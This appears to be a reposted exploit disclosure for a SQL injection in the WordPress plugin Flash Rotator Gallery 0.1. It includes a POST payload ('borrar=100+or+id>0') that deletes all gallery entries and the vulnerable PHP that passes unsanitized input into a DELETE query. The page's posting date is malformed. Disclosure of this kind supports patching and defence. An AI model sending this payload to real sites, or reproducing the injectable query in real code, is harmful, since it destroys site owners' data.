Home / os / winme

WordPress plugin Flash Rotator Gallery SQL injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress plugin Flash Rotator Gallery SQL injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: WordPress plugin Flash Rotator Gallery - SQL injection # Date: 2017-03-12 # Exploit Author: malwrforensics # Vendor Homepage: http://www.webpsilon.com/wordpress-plugins/flash-rotator-gallery/ # Software Link: https://downloads.wordpress.org/plugin/flash-rotator-gallery.zip # Version: 0.1 # Tested on: Linux HTTP request data: POST http://192.168.205.102/wordpress/wp-admin/admin.php?page=flash_rotator_gallery.php HTTP/1.1 <snip> borrar=100+or+id>0 #delete all entries Technical details: Affected file: flash-rotator-gallery.php <snip> if(isset($_POST['borrar'])) { $sql = "DELETE FROM $table_name WHERE id = ".$_POST['borrar'].";"; #$_POST['borrar'] is not sanitized $wpdb->query($sql); <snip> Thanks.</BODY></HTML>

 

TOP